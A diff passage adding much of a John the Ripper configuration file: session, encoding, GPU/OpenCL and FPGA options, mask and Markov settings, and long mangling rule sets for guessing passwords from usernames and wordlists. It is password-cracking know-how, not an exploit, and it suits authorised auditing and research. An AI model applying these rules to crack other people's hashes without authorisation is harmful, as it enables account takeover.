+#SingleRetestGuessed = N
+
+# Set the maximum word buffer size used by Single mode. The default is
+# 4 GB. If running fork this is the *total* used by a session (size is
+# divided by number of forks). If running MPI, we try to determine the
+# number of local processes on each node and divide it accordingly.
+SingleMaxBufferSize = 4
+
+# When running single mode with a GPU or accelerator, we prioritize speed
+# (saturating buffers) over resume ability:  When resuming such a session
+# it may take longer to catch up.  Set this option to Y to prioritize
+# resuming instead, at the cost of max. speed.
+SinglePrioResume = N
+
+# Protect the restore files (*.rec) from being overwritten. The default
+# mode is "Disabled". This mode will provide no protection, but has been
+# the default mode in JtR forever, so to not change behavior, that mode
+# has been kept as default.  You can change this to "Named" or "Always"
+# If this option is changed to "Named", then any restore file created
+# with a --session=xxxx will be protected from being overwritten. If
+# the option is set to "Always", then all .rec files will be kept from
+# being overwritten, even ${JOHN}/john.rec file
+#SessionFileProtect = Named
+
+# Protect the log files (*.log) from being reused by new sessons.
+# The default mode is "Disabled". That means, a nee session will just append
+# to an existing log file.
+# With "Named", a new session will not be allowed to append to an existing
+# log file, except if the --session=NAME option hasn't been used.
+# With "Always", not even the default log file ${JOHN}/john.log can be
+# reused by a new session.
+# (Of course, a restored session will always be allowed to append to an
+# existing log file.)
+# Unless you use the --nolog option, setting LogFileProtect will also
+# prevent overwriting existing session files.
+#LogFileProtect = Named
+
+# Emit a status line whenever a password is cracked (this is the same as
+# passing the --crack-status option flag to john). NOTE: if this is set
+# to true here, --crack-status will toggle it back to false.
+CrackStatus = N
+
+# When printing status, show number of candidates tried (eg. 123456p).
+# This is added to the "+ Cracked" line in the log as well (and that figure
+# will be exact while the screen output will be a multiple of batch size).
+StatusShowCandidates = N
+
+# Write cracked passwords to the log file (default is just the user name)
+LogCrackedPasswords = N
+
+# Disable the dupe checking when loading hashes. For testing purposes only!
+NoLoaderDupeCheck = N
+
+# Default encoding for input files (ie. login/GECOS fields) and wordlists
+# etc.  If this is not set here and --encoding is not used either, the default
+# is ISO-8859-1 for Unicode conversions and 7-bit ASCII encoding is assumed
+# for rules, e.g., uppercasing of letters other than a-z will not work at all!
+DefaultEncoding = UTF-8
+
+# Default --target-encoding for Microsoft hashes (LM, NETLM et al) when input
+# encoding is UTF-8. CP850 would be a universal choice for covering most
+# "Latin-1" countries.
+DefaultMSCodepage = CP850
+
+# Default internal legacy codepage to be used by mask mode and within the
+# rules engine, when both input and target encodings are Unicode (eg. UTF-8
+# wordlist and NT hashes). In some cases this hits performance but lets us
+# do things like Unicode case conversions. You can pick any supported
+# legacy codepage that has as much support for the input data as possible,
+# e.g., for "Latin-1" language passwords you can use ISO-8859-1, CP850 or
+# CP1252 and it will hardly make any difference but in some cases, ISO-8859-1
+# is fastest. Using "UTF-8" (which is not a legacy codepage!) will disable.
+#
+# The default is to NOT use any internal codepage.
+#DefaultInternalCodepage = ISO-8859-1
+
+# Warn if seeing UTF-8 when expecting some other encoding, or vice versa.
+# This is disabled for ASCII or RAW encodings, for performance.
+WarnEncoding = Y
+
+# Always report (to screen and log) cracked passwords as UTF-8, regardless of
+# input encoding. This is recommended if you have your terminal set for UTF-8.
+AlwaysReportUTF8 = Y
+
+# Always store Unicode (UTF-16) passwords as UTF-8 in john.pot, regardless
+# of input encoding. This prevents john.pot from being filled with mixed
+# and eventually unknown encodings. This is recommended if you have your
+# terminal set for UTF-8 and/or you want to run --loopback for LM->NT
+# including non-ASCII.
+UnicodeStoreUTF8 = Y
+
+# Always report/store non-Unicode formats as UTF-8, regardless of input
+# encoding. Note: The actual codepage that was used is not stored anywhere
+# except in the log file.
+# This is needed e.g. for --loopback to crack LM->NT including non-ASCII.
+CPstoreUTF8 = Y
+
+# Normally, we try to handle Unicode characters not in our selected codepage
+# with best effort. Enabling this option will instead translate any such
+# character to "?" (default), to meet certain formats' behavior.
+EmulateBrokenEncoding = N
+ReplacementCharacter = ?
+
+# Default verbosity is 3, valid figures are 1-5 right now.
+# 4-5 enables some extra output and diagnostics.
+# 4 is same verbosity as "john proper" aka. non-jumbo.
+# 3 mutes rules & incremental output in logs (LOTS of lines).
+# 2 mutes some other diagnostics.
+# 1 even mutes printing (to screen) of cracked passwords.
+Verbosity = 3
+
+# If set to Y, do not output, log  or store cracked passwords verbatim.
+# This implies a different default .pot database file "secure.pot" instead
+# of "john.pot" but it can still be overridden using --pot=FILE.
+# This also overrides other options, e.g. LogCrackedPasswords.
+SecureMode = N
+
+# If set to Y, a session using --fork or MPI will signal to other nodes when
+# it has written cracks to the pot file, so they will re-sync. Note that this
+# may be delayed by buffers and the "Save" timer setting near top of this file.
+ReloadAtCrack = N
+
+# If set to Y, a session using --fork or MPI will signal to other nodes when
+# it has cracked all hashes (there's nothing more to do!). This is ignored
+# when ReloadAtCrack = Y because it's redundant.
+ReloadAtDone = Y
+
+# If set to Y, resync pot file when saving session. This does not involve any
+# signalling, we just detect that someone else wrote to the pot file.
+# This will sync with concurrent sessions even when not using --fork or MPI
+# but it may be delayed by the "Save" timer setting near top of this file.
+ReloadAtSave = Y
+
+# If this file exists, john will abort cleanly
+AbortFile = /var/run/john/abort
+
+# While this file exists, john will pause
+PauseFile = /var/run/john/pause
+
+# If set to true, the uid will be appended to user name on cracks
+#   With:     password123      (Administrator:500)
+#   Without   password123      (Administrator)
+# This is disabled by --save-memory.
+ShowUIDinCracks = N
+
+# This sets the "grace time" for --max-run-time=N. If john has not finished
+# this long after the initial abort signal, it will send another one (similar
+# to pressing ctrl-c a second time) which will stop john immediately and not
+# wait further for an optimal resume point.
+# Setting this to 0 means NO grace time - immediately abort. Setting it to
+# a negative number means UNLIMITED grace time - never hard abort.
+AbortGraceTime = 30
+
+# Setting this to true allows SAP-B and SAP-G "half hashes" to be cracked.
+# These are taken from RFC_READ_TABLE and padded with nulls to correct length.
+# This may produce some false positives if enabled, at least for SAP-B.
+SAPhalfHashes = N
+
+# This allows you to list a few words/names that will be used by single mode
+# as if they were included in every GECOS field.  Use sparingly! Please note
+# that the example words are commented out, so the list is empty!
+[List.Single:SeedWords]
+#Pass
+#Secret
+#Test
+
+# This allows you to read extra pot files when loading hashes. Nothing will
+# ever be written to these files, they are just read. Any directory in this
+# list will be traversed and files in it with an extension of .pot will be
+# read. However there will NOT be any recursion down further directory levels.
+# Any entries that don't exist will be silently ignored.
+[List.Extra:Potfiles]
+#somefile.pot
+#somedirectory
+#$JOHN/my.pot
+
+[Options:CPUtune]
+# If preset is given, use it and skip autotune (NOTE: non-intel archs will
+# currently ignore this option and always autotune)
+UsePreset = Y
+# Performance sample time, default 10 ms
+AutoTuneSampleTime = 10
+# Required gain to consider this scale better. Default is 1 %
+AutoTuneReqGain = 1
+# Max crypt_all() duration for trying a higher scale, default 100 ms
+AutoTuneMaxDuration = 100
+# If we tried this many increases of scale w/o gain, give up. Default 3.
+AutoTuneMaxNoProgress = 3
+
+[Options:MPI]
+# Automagically disable OMP if MPI is used (set to N if
+# you want to run one MPI process per multi-core host)
+MPIOMPmutex = Y
+
+# Print a notice if disabling OMP (when MPIOMPmutex = Y)
+# or when running OMP and MPI at the same time
+MPIOMPverbose = Y
+
+# Assume all MPI nodes are homogenous; Enforce same OpenCL workgroup sizes.
+MPIAllGPUsSame = N
+
+# These formats are disabled from all-formats --test runs, or auto-selection
+# of format from an input file. Even when disabled, you can use them as long
+# as you spell them out with the --format option. Or you can delete a line,
+# comment it out, or change to 'N'
+[Disabled:Formats]
+#formatname = Y
+.include '$JOHN/dynamic_disabled.conf'
+
+# Options that may affect both GPUs and other accelerators (eg. FPGA)
+[Options:GPU]
+# Show GPU temperature, fan and utilization along with normal status output
+SensorsStatus = Y
+
+# If SensorsStatus is true, individual ones can be turned off
+TempStatus = Y
+UtilStatus = N
+FanStatus = N
+
+# Abort session if GPU hits this temperature (in C)
+AbortTemperature = 95
+
+
+# ZTEX specific settings
+[ZTEX:descrypt]
+# The design has two programmable clocks. The 1st one is supplied to
+# pipelines of DES rounds, the 2nd clock is supplied to comparators.
+# Startup frequencies are 220,160.
+#Frequency = 220,160
+
+[ZTEX:bcrypt]
+# Define typical setting of hashes it's going to process. It allows
+# to adjust for best performance.
+TargetSetting = 6
+# Startup frequency for bcrypt-ztex is 140. Design tools guaranteed
+# 141.5 in worst-case temperature and voltage.
+Frequency = 141
+# It's possible to set frequency on per-board and per-fpga basis.
+#Frequency_04A36E0FD6 = 142
+#Frequency_04A36E0FD6_0 = 143
+#Frequency_04A36E0FD6_3 = 144
+
+[ZTEX:sha512crypt]
+#TargetRounds = 5000
+# Design tools reported possible frequency to be 215 MHz.
+# We never encountered a board where this worked anywhere close
+# to such high frequency. Default frequency is set to 160 MHz.
+# Some lucky boards might run at some higher frequency.
+Frequency = 160
+#Config1 = \x00\x00
+
+[ZTEX:Drupal7]
+#TargetRounds = 16384
+# Drupal7 uses same bitstream as sha512crypt, see comment regarding
+# default frequency in sha512crypt section.
+#Frequency = 160
+# Some bitstreams accept runtime configuration.
+# In sha512crypt/Drupal7, configuration is 2 bytes. That's interpreted
+# as a bitmask. By setting any of the lowest 10 bits to 1 it turns off
+# corresponding unit (there are 10 units in the bitstream).
+# This turns off units 0 and 1.
+#Config1 = \x03\x00
+# This turns off all 10 units (resulting in a timeout).
+#Config1_04A36E0FD6_0 = \xff\x03
+
+[ZTEX:sha256crypt]
+# Design tools reported possible frequency is 166.3 but tested boards
+# miss guesses, often fail unless frequency is decreased.
+#Frequency = 165
+Frequency = 135
+#TargetRounds = 1000000
+
+# md5crypt and phpass use same bitstream. Design tools reported
+# possible frequency is 202 MHz. Tested boards run OK at 180 MHz.
+[ZTEX:md5crypt]
+Frequency = 180
+
+[ZTEX:phpass]
+Frequency = 180
+#TargetRounds = 2048
+
+[Options:OpenCL]
+# Set default OpenCL device. Command line option will override this.
+# If not set, we will search for a GPU or fall-back to the most
+# powerful device.
+#Device = 0
+
+# If commented out and set to true, store LWS and GWS in session file for
+# later resume. Note that when resuming, this option is ignored: If the
+# session file was written with this option set, it will still be used.
+#ResumeWS = Y
+
+# Global max. single kernel invocation duration, in ms. Setting this low
+# (eg. 10-100 ms) gives you a better responding desktop but lower performance.
+# Setting it high (eg. 200-500 ms) will maximize performance but your desktop
+# may lag. Really high values may trip watchdogs (eg. 5 seconds). Some versions
+# of AMD Catalyst may hang if you go above 200 ms, and in general any good
+# kernel will perform optimally at 100-200 ms anyway.
+#Global_MaxDuration = 200
+
+# Some formats vectorize their kernels in case the device says it's a good
+# idea. Some devices give "improper" hints which means we vectorize but get
+# a performance drop. If you have such a device, uncommenting the below
+# will disable vectorizing globally.
+# With this set to N (or commented out) you can force it per session with
+# the --force-scalar command-line option instead.
+#ForceScalar = Y
+
+# Global build options. Format-specific build options below may be
+# concatenated to this.
+GlobalBuildOpts = -cl-mad-enable
+
+# Initial local work-size for auto-tune (CPU devices excepted).
+# 0 means let the OpenCL implementation pick a suitable value.
+# 1 means query for "best multiple" (usually corresponds to "warp size").
+# Any other value (eg. 64) will be taken verbatim.
+AutotuneLWS = 1
+
+
+# Format-specific settings:
+
+# Uncomment the below for nvidia sm_30 and beyond.
+# Please, check if it is really better.
+#sha512crypt_BuildOpts = -cl-nv-maxrregcount=80
+
+# Best configuration value to be used at runtime.
+sha512crypt_Bonaire = -DUNROLL_LOOP=132104
+
+# Example: Override auto-tune for RAR format.
+#rar_LWS = 128
+#rar_GWS = 8192
+
+[List.OpenCL:Drivers]
+#Driver ; Description         ; Recommendation
+#AMD driver versions
+938 , 2 ; 12.8                ;
+1084, 4 ; 13.1                ;
+1124, 2 ; 13.4                ;
+1214, 3 ; 13.6 beta           ;
+1311, 2 ; 13.11 beta-1        ;
+1348, 5 ; 13.12               ;
+1445, 5 ; 14.4 (Mantle)       ;
+1526, 3 ; 14.6 beta (Mantle)  ;
+1573, 4 ; 14.9 (Mantle)       ; VGL S
+1642, 5 ; 14.12 (Omega)       ; VGL S
+1702, 3 ; 15.5 beta           ;     T
+1729, 3 ; 15.5                ;
+1800, 5 ; 15.7                ; VG* R
+1800, 8 ; 15.7.1              ; VGW R
+1800, 11; 15.9                ; VGL S
+1912, 5 ; 15.12               ;
+#NVIDIA driver versions
+346, 0  ;                     ; N*  R
+319, 0  ;                     ; N*  S
+#End
+0, 0    ;                     ;
+
+#Labels
+# * -> all OS
+# N -> NVIDIA
+# G -> GCN
+# V -> VLIW4 and VLIW5
+# W -> Windows
+# L -> Linux
+# R -> recommended
+# S -> supported
+# T -> not recommended: really bad software. I mean "trash".
+
+[PRINCE]
+# Default wordlist file name. Will fall back to standard wordlist if not
+# defined.
+#Wordlist = $JOHN/password.lst
+
+
+# Markov modes, see ../doc/MARKOV for more information
+[Markov:Default]
+# Default Markov mode settings
+#
+# Statsfile cannot be specified on the command line, so
+# specifying it here is mandatory
+Statsfile = $JOHN/stats
+# MkvLvl and MkvMaxLen should also be specified here, as a fallback for
+# --markov usage without specifying LEVEL and/or --max-length on the
+# command line.
+MkvLvl = 200
+MkvMaxLen = 12
+# MkvMinLvl and MkvMinLen should not be specified at all in [Markov:Default],
+# or they should be equal to 0 (which is the default if not specified.
+# MkvMinLvl and MkvMinLen can be used in other Markov mode sections
+# except [Markov:Default]
+; MkvMinLvl = 0
+; MkvMinLen = 0
+
+# A user defined character class is named with a single digit, ie. 0..9. After
+# the equal-sign, just list all characters that this class should match. You
+# can specify ranges within brackets, much like pre-processor ranges in rules.
+# BEWARE of encoding if using non-ASCII characters. If you put UTF-8 characters
+# here, it will *not* work! You must use a singlebyte encoding and it should
+# be the same here as you intend to use for your dictionary.
+# You can however put characters here in \xA3 format (for codepoint 0xA3 - in
+# many iso-8859 codepages that would mean a pound sign). This works in ranges
+# too. Using \x00 is not supported though - it will not be parsed as null.
+#
+# This is a couple of example classes:
+# ?0 matches (one version of) base64 characters
+# ?1 matches hex digits
+# ?2 matches the TAB character (never try to use \x00!)
+[UserClasses]
+0 = [a-zA-Z0-9/.]
+1 = [0-9a-fA-F]
+2 = \x09
+
+[Mask]
+# When iterating over length, emit a status line after each length is done
+MaskLengthIterStatus = Y
+
+# Default mask for -mask if none is given. This is same as hashcat's default.
+DefaultMask = ?1?2?2?2?2?2?2?3?3?3?3?d?d?d?d
+
+# Default mask for Hybrid mask mode if none is given.
+DefaultHybridMask = ?w?d?d?d?d
+
+# Mask mode have custom placeholders ?1..?9 that look similar to user classes
+# but are a different thing. They are merely defaults for the -1..-9 command
+# line options. As delivered, they resemble hashcat's defaults.
+1 = ?l?d?u
+2 = ?l?d
+3 = ?l?d*!$@_
+4 =
+5 =
+6 =
+7 =
+8 =
+9 =
+
+[Subsets]
+# When iterating over length, emit a status line after each length is done
+LengthIterStatus = Y
+
+# Min/Max number of unique characters. MaxDiff can't be set larger than 16.
+MinDiff = 1
+MaxDiff = 7
+
+# Default charset, either a literal string or a single-digit number pointing
+# to one of the sets below. If not defined, all printable ASCII is used.
+#DefaultCharset = 0
+
+# Subsets mode charsets 0-9. These are literal strings. TAB and space
+# characters can be used as long as they do not come first or last. The only
+# "magic" used here is \U+HHHH or \U+HHHHH for any Unicode character (except
+# the very highest private area that has six hex digits). For example, you
+# could say \U+1F600 for a "Grinning Face".
+0 = 0123456789abcdef
+1 = ABCDEF0123456789
+2 = 0123456789abcdefghijklmnopqrstuvwxyzàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿABCDEFGHIJKLMNOPQRSTUVWXYZÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞß !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿
+3 = 0123456789άέήίαβγδεζηθικλμνξοπρςστυφχψωϊϋόύώΆΈΉΊΌΎΏΑΒΓΔΕΖΗΘΙΚΛΜΝΞΟΠΡΣΤΥΦΧΨΩΪΫ !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
+4 = 0123456789абвгдежзийклмнопрстуфхцчшщъыьэюяёЁАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ№ !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
+5 =
+6 =
+7 =
+8 =
+9 =
+
+[Regen_Salts_UserClasses]
+# These are user defined character sets.  Their purpose is to allow custom salt
+# values to be used within the salt_regen logic.  These will be the characters
+# to use for this character within the salt.  So if we had a salt that was 4
+# characters, and 0-9a-m, we can easily do this by 0 = [0-9a-m].  If this is
+# used, the regen salt value would be ?0?0?0?0 and salts such as a47m 2kd5
+# would be valid.
+1 = [1-9]
+
+# A "no rules" rule for eg. super-fast Single mode (use with --single=none)
+[List.Rules:None]
+:
+
+# A "drop all" rule for even faster Single mode (debugging :)
+[List.Rules:Drop]
+<1'0
+
+# These are good rules on larger sites where a user ID may already be used,
+# so a user simply appends numbers to create his loginID, but then uses the
+# login name he wanted as basis for password. Just strip off digits and treat
+# the base-word to some manipulation. These rules found from the 2015 A-M
+# leak.  Only adds 30-50 permutations and only applied to user names that have
+# digits contained within them, and cracks quite a few.
+# These are currently Jumbo-specific.
+[List.Rules:JumboSingle]
+/?d @?d >4
+/?d @?d M @?A >4 Q
+-c /?d @?d >4 M [lc] Q
+-c /?d @?d M @?A >4 Q M [lc] Q
+@?D Q >4
+/?d @?d >3 <* $[0-9] Q
+-c /?d @?d >3 <* M [lc] Q $[0-9]
+/?d @?d >3 <- Az"12" <+ Q
+-c /?d @?d >3 <- M [lc] Q Az"12" <+
+/?d @?d >3 Az"123" <+ Q
+-c /?d @?d >3 M [lc] Q Az"123" <+
+/?d @?d >2 al d
+-c /?d @?d >2 al M [lc] Q d
+(?a )?d /?d a0 'p Xpz0
+)?a (?d /?a a0 'p Xpz0
+
+
+# "Single crack" mode rules
+[List.Rules:Single]
+# Simple rules come first...
+:
+-s x**
+-c (?a c Q
+-c l Q
+-s-c x** /?u l
+# These were not included in crackers I've seen, but are pretty efficient,
+# so I include them near the beginning
+-<6 ->6 >6 '6
+-<7 ->7 >7 '7 l
+-<6 ->6 -c >6 '6 /?u l
+-<5 ->5 >5 '5
+
+# Wedge the Jumbo-specific addons in here!
+.include [List.Rules:JumboSingle]
+
+# Weird order, eh? Can't do anything about it, the order is based on the
+# number of successful cracks...
+al d
+a0 r c
+-c al (?a d c
+-<5 ->5 -c >5 '5 /?u l
+-c a0 u Q
+-c a0 )?a r l
+-[:c] <* !?A \p1[lc] p
+-c al c Q d
+-<7 ->7 -c >7 '7 /?u
+-<4 ->4 >4 '4 l
+-c a0 (?l c r
+-c a0 )?l l Tm
+-<3 ->3 >3 '3
+-<4 ->4 -c >4 '4 /?u
+-<3 ->3 -c >3 '3 /?u l
+-c a0 u Q r
+al d M 'l f Q
+-c al l Q d M 'l f Q
+# About 50% of single-mode-crackable passwords get cracked by now...
+# >2 x12 ... >8 x18
+->[3-9] >\p[2-8] x1\0
+->9 >9 \[
+# >3 x22 ... >9 x28
+->[4-9A] >\p[3-9] x2\p[2-8]
+# >4 x32 ... >9 x37
+->[5-9A] >\p[4-9] x3\p[2-7]
+# >2 x12 /?u l ... >8 x18 /?u l
+-c ->[3-9] >\p[2-8] x1\0 /?u l
+-c ->9 >9 \[ /?u l
+# >3 x22 /?u l ... >9 x28 /?u l
+-c ->[4-9A] >\p[3-9] x2\p[2-8] /?u l
+# >4 x32 /?u l ... >9 x37 /?u l
+-c ->[5-9A] >\p[4-9] x3\p[2-7] /?u l
+# Now to the suffix stuff...
+a1 l $[1-9!0a-rt-z"-/:-@\[-`{-~]
+-c a1 (?a c $[1-9!0a-rt-z"-/:-@\[-`{-~]
+-[:c] a1 !?A (?\p1[za] \p1[lc] $s M 'l p Q X0z0 'l $s
+-[:c] a1 /?A (?\p1[za] \p1[lc] $s
+a1 l r $[1-9!]
+-c a1 /?a u $[1-9!]
+-[:c] a2 (?\p1[za] \p1[lc] Az"'s"
+-[:c] a2 (?\p1[za] \p1[lc] Az"!!"
+-[:c] a3 (?\p1[za] \p1[lc] Az"!!!"
+# Removing vowels...
+-[:c] b1 /?v @?v >2 (?\p1[za] \p1[lc]
+/?v @?v >2 al d
+# crack -> cracked, crack -> cracking
+<* l [PI]
+-c <* l [PI] (?a c
+# mary -> marie
+-[:c] a1 (?\p1[za] \p1[lc] )y omi $e
+# marie -> mary
+-[:c] b1 (?\p1[za] \p1[lc] )e \] )i val1 oay
+# The following are some 3l33t rules
+-[:c] l /[aelos] s\0\p[4310$] (?\p1[za] \p1[:c]
+-[:c] l /a /[elos] sa4 s\0\p[310$] (?\p1[za] \p1[:c]
+-[:c] l /e /[los] se3 s\0\p[10$] (?\p1[za] \p1[:c]
+-[:c] l /l /[os] sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /o /s so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /a /e /[los] sa4 se3 s\0\p[10$] (?\p1[za] \p1[:c]
+-[:c] l /a /l /[os] sa4 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /a /o /s sa4 so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /e /l /[os] se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /[el] /o /s s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-[:c] l /a /[el] /o /s sa4 s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /e /l /o /s se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
+-[:c] l /a /e /l /o /s sa4 se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
+# Now to the prefix stuff...
+l ^[1a-z2-90]
+-c l Q ^[A-Z]
+^[A-Z]
+l ^["-/:-@\[-`{-~]
+-[:c] <9 (?a \p1[lc] A0"[tT]he"
+-[:c] <9 (?a \p1[lc] A0"[aA]my"
+-[:c] <9 (?a \p1[lc] A0"[mdMD]r"
+-[:c] <9 (?a \p1[lc] A0"[mdMD]r."
+-[:c] <9 (?a \p1[lc] A0"__"
+<- !?A l p ^[240-9]
+# Some word pair rules...
+# johnsmith -> JohnSmith, johnSmith
+-p-c (?a 2 (?a c 1 [cl]
+# JohnSmith -> john smith, john_smith, john-smith
+-p 1 <- $[ _\-] + l
+# JohnSmith -> John smith, John_smith, John-smith
+-p-c 1 <- (?a c $[ _\-] 2 l
+# JohnSmith -> john Smith, john_Smith, john-Smith
+-p-c 1 <- l $[ _\-] 2 (?a c
+# johnsmith -> John Smith, John_Smith, John-Smith
+-p-c 1 <- (?a c $[ _\-] 2 (?a c
+# Applying different simple rules to each of the two words
+-p-[c:] 1 \p1[ur] 2 l
+-p-c 2 (?a c 1 [ur]
+-p-[c:] 1 l 2 \p1[ur]
+-p-c 1 (?a c 2 [ur]
+# jsmith -> smithj, etc...
+-[:c] (?a \p1[lc] [{}]
+-[:c] (?a \p1[lc] [{}] \0
+# Toggle case...
+-c <+ )?u l Tm
+-c T0 Q M c Q l Q u Q C Q X0z0 'l
+-c T[1-9A-E] Q M l Tm Q C Q u Q l Q c Q X0z0 'l
+-c l Q T[1-9A-E] Q M T\0 Q l Tm Q C Q u Q X0z0 'l
+-c >2 <G %2?a [lu] T0 M T2 T4 T6 T8 TA TC TE Q M l Tm Q X0z0 'l
+-c >2 /?l /?u t Q M c Q C Q l Tm Q X0z0 'l
+# Deleting chars...
+>[2-8] D\p[1-7]
+>[8-9A-E] D\1
+-c /?u >[2-8] D\p[1-7] l
+-c /?u >[8-9A-E] D\1 l
+=1?a \[ M c Q
+-c (?a >[1-9A-E] D\1 c
+# Inserting a dot...
+-[:c] >3 (?a \p1[lc] i[12].
+# More suffix stuff...
+<- l Az"[190][0-9]"
+-c <- (?a c Az"[190][0-9]"
+<- l Az"[782][0-9]"
+-c <- (?a c Az"[782][0-9]"
+<* l $[A-Z]
+-c <* (?a c $[A-Z]
+# cracking -> CRACKiNG
+-c u /I sIi
+# Crack96 -> cRACK96
+%2?a C Q
+# Crack96 -> cRACK(^
+/?A S Q
+# Crack96 -> CRaCK96
+-c /?v V Q
+# Really weird charset conversions, like "england" -> "rmh;smf"
+:[RL] Q
+l Q [RL]
+-c (?a c Q [RL]
+:[RL] \0 Q
+# Both prefixing and suffixing...
+<- l ^[1!@#$%^&*\-=_+.?|:'"] $\1
+<- l ^[({[<] $\p[)}\]>]
+# The rest of two-digit suffix stuff, less common numbers...
+<- l Az"[63-5][0-9]"
+-c <- (?a c Az"[63-5][0-9]"
+# Some multi-digit numbers...
+-[:c] (?a \p1[lc] Az"007" <+
+-[:c] (?a \p1[lc] Az"123" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0" <+
+-[:c] (?a \p1[lc] Az"1234" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0\0" <+
+-[:c] (?a \p1[lc] Az"12345" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0\0\0" <+
+-[:c] (?a \p1[lc] Az"123456" <+
+-[:c] (?a \p1[lc] Az"[0-9]\0\0\0\0\0" <+
+# Some [birth] years...
+l Az"19[7-96-0]" <+ >-
+l Az"20[01]" <+ >-
+l Az"19[7-9][0-9]" <+
+l Az"20[01][0-9]" <+
+l Az"19[6-0][9-0]" <+
+
+[List.Rules:Extra]
+# Insert/overstrike some characters...
+!?A >[1-6] l i\0[a-z]
+!?A l o0[a-z]
+!?A >[1-7] l o\0[a-z]
+# Toggle case everywhere (up to length 8), assuming that certain case
+# combinations were already tried.
+-c T1 Q M T0 Q
+-c T2 Q M T[z0] T[z1] Q
+-c T3 Q M T[z0] T[z1] T[z2] Q
+-c T4 Q M T[z0] T[z1] T[z2] T[z3] Q
+-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] Q
+-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] Q
+-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] Q
+# Very slow stuff...
+l Az"[1-90][0-9][0-9]" <+
+-c (?a c Az"[1-90][0-9][0-9]" <+
+<[\-9] l A\p[z0]"[a-z][a-z]"
+<- l ^[a-z] $[a-z]
+
+# Wordlist mode rules
+[List.Rules:Wordlist]
+# Try words as they are
+:
+# Lowercase every pure alphanumeric word
+-c >3 !?X l Q
+# Capitalize every pure alphanumeric word
+-c (?a >2 !?X c Q
+# Lowercase and pluralize pure alphabetic words
+<* >2 !?A l p
+# Lowercase pure alphabetic words and append '1'
+<* >2 !?A l $1
+# Capitalize pure alphabetic words and append '1'
+-c <* >2 !?A c $1
+# Duplicate reasonably short pure alphabetic words (fred -> fredfred)
+<7 >1 al !?A l d
+# Lowercase and reverse pure alphabetic words
+>3 !?A l M r Q
+# Prefix pure alphabetic words with '1'
+>2 !?A l ^1
+# Uppercase pure alphanumeric words
+-c >2 !?X u Q M c Q u
+# Lowercase pure alphabetic words and append a digit or simple punctuation
+<* >2 !?A l $[2!37954860.?]
+# Words containing punctuation, which is then squeezed out, lowercase
+/?p @?p >3 l
+# Words with vowels removed, lowercase
+/?v @?v >3 l
+# Words containing whitespace, which is then squeezed out, lowercase
+/?w @?w >3 l
+# Capitalize and duplicate short pure alphabetic words (fred -> FredFred)
+-c <7 >1 al !?A c d
+# Capitalize and reverse pure alphabetic words (fred -> derF)
+-c <+ >2 !?A c r
+# Reverse and capitalize pure alphabetic words (fred -> Derf)
+-c >2 !?A l M r Q c
+# Lowercase and reflect pure alphabetic words (fred -> fredderf)
+<7 >1 al !?A l d M 'l f Q
+# Uppercase the last letter of pure alphabetic words (fred -> freD)
+-c <+ >2 !?A l M r Q c r
+# Prefix pure alphabetic words with '2' or '4'
+>2 !?A l ^[24]
+# Capitalize pure alphabetic words and append a digit or simple punctuation
+-c <* >2 !?A c $[2!3957468.?0]
+# Prefix pure alphabetic words with digits
+>2 !?A l ^[379568]
+# Capitalize and pluralize pure alphabetic words of reasonable length
+-c <* >2 !?A c p
+# Lowercase/capitalize pure alphabetic words of reasonable length and convert:
+# crack -> cracked, crack -> cracking
+-[:c] <* >2 !?A \p1[lc] M [PI] Q
+# Try the second half of split passwords
+-s x**
+-s-c x** M l Q
+
+# Case toggler for cracking MD4-based NTLM hashes (with the contributed patch)
+# given already cracked DES-based LM hashes.  Use --rules=NT to use this.
+[List.Rules:NT]
+:
+-c T0Q
+-c ->2 a0 T1QT[z0]
+-c ->3 a0 T2QT[z0]T[z1]
+-c ->4 a0 T3QT[z0]T[z1]T[z2]
+-c ->5 a0 T4QT[z0]T[z1]T[z2]T[z3]
+-c ->6 a0 T5QT[z0]T[z1]T[z2]T[z3]T[z4]
+-c ->7 a0 T6QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]
+-c ->8 a0 T7QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]
+-c ->9 a0 T8QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]
+-c ->A a0 T9QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]
+-c ->B a0 TAQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]
+-c ->C a0 TBQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]
+-c ->D a0 TCQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]
+-c ->E a0 TDQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]T[zC]
+
+# Shift toggler, up to length 16
+[List.Rules:ShiftToggle]
+:
+W0Q
+->2 a0 W1QW[z0]
+->3 a0 W2QW[z0]W[z1]
